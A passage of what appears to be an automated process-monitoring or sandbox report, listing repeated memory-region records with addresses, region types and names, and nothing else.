"" Region: id = 21180 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21181 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21182 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21183 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21184 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21185 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21186 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21187 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21188 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21189 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21190 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21191 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21192 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21193 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21194 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21195 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21196 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21197 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21198 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21199 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21200 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21201 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21202 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21203 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21204 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21205 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21206 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21207 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21208 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21209 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21210 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21211 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21212 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21213 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21214 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21215 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21216 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21217 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21218 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21219 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21220 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21221 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21222 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21223 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21224 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21225 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21226 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21227 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21228 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21229 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21230 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21231 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21232 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21233 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21234 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21235 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21236 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21237 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21238 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21239 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21240 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21241 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21242 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21243 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21244 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21245 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21246 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21247 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21248 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21249 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21250 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21251 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21252 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21253 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21254 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21255 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21256 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21257 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21258 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21259 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21260 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21261 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21262 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21263 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21264 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21265 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21266 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21267 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21268 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21269 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21270 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21271 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21272 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21273 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21274 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21275 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21276 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21277 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21278 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21279 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21280 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21281 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21282 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21283 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21284 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21285 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21286 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21287 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21288 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21289 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21290 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21291 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21292 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21293 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21294 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21295 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21296 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21297 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21298 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21299 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21300 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21301 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21302 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21303 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21304 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21305 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21306 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21307 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21308 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21309 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21310 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21311 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21312 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21313 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21314 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21315 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21316 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21317 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21318 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21319 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21320 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21321 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21322 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21323 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21324 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21325 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21326 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21327 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21328 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21329 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21330 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21331 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21332 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21333 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21334 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21335 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21336 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21337 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21338 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21339 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21340 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21341 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21342 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21343 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21344 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21345 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21346 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21347 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21348 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21349 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21350 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21351 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21352 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21353 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21354 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21355 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21356 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21357 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21358 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21359 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21360 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21361 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21362 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21363 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21364 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21365 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21366 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21367 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21368 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21369 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21370 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21371 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21372 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21373 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21374 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21375 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21376 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21377 start_va = 0x570000 end_va = 0x57efff monitored = 1 